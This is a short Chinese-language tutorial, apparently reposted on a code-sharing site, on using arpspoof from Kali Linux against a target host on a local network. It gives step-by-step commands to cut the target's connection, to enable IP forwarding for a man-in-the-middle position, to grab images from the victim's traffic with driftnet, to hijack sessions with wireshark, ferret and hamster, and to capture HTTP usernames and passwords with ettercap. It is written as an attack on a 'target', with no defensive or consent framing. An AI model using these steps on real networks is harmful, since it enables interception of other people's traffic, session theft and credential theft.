arpspoof與其他幾款工具的使用


arpspoof 是一款進行arp欺騙的工具

arpspoof -i 網卡 -t 目標ip 默認網關

如果kali沒有進行IP轉發  那么目標就會因為配置錯網而導致斷網 這就是所謂的arp斷網攻擊

開啟IP轉發:echo 1 >/proc/sys/net/ipv4/ip_forward
關閉IP轉發:echo 0 >/proc/sys/net/ipv4/ip_forward
查看IP轉發是否成功:cat /proc/sys/net/ipv4/ip_forward  如果顯示1則表示開啟成功,顯示0則開啟失敗

開啟IP轉發后 流量會經過kali的主機而后再去到目標 所以這時開啟arpspoof 那么目標就不會斷網

因為流量通過了kali主機那么我們就可以做點手腳了

比如:

獲取目標主機正在訪問的圖片-->工具 arpspoof 和 driftnet 

driftnet用法: driftnet -i 網卡 

在開啟路由轉發后 開啟arpspoof 因為流量通過了kali主機 我們就可以用driftnet獲取在流量中的圖片 

 

 

會話劫持-->工具 arpspoof 和 wireshark , ferret, hamster

wireshark  抓包工具
ferret  將.pcap文件轉換問.txt給hamster使用
hamster 重新釋放流量

1.開啟ip轉發和arpspoof

2.用wireshark抓包並報存到/root/目錄(文件格式為.pcap)->在命令行直接輸入wireshark即可打開工具

3.用 cd 切換到/root/目錄 用ferret將wireshark保存的.pcap格式文件轉換為txt文件

ferret用法: ferret -r .pcap格式文件 

4.用hamster重放流量

hamster用法: hamster  -h

5.在瀏覽器中設置代理127.0.0.1:1234 然后訪問127.0.0.1:1234 

如果在瀏覽器下方出現目標ip則成功 反之失敗

點擊那個標簽 瀏覽器左邊就會出現很多url 這些就是目標訪問的網站  點擊這些url 就可以了

~~~~~

 

 

獲取目標http賬號密碼

1.開啟ip轉發和arpspoof

2.開啟ettercap

 

Ettercap -Tq -i 網卡

 

如果目標登錄了某網站 那么我們可以獲取他的賬號密碼了

  

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM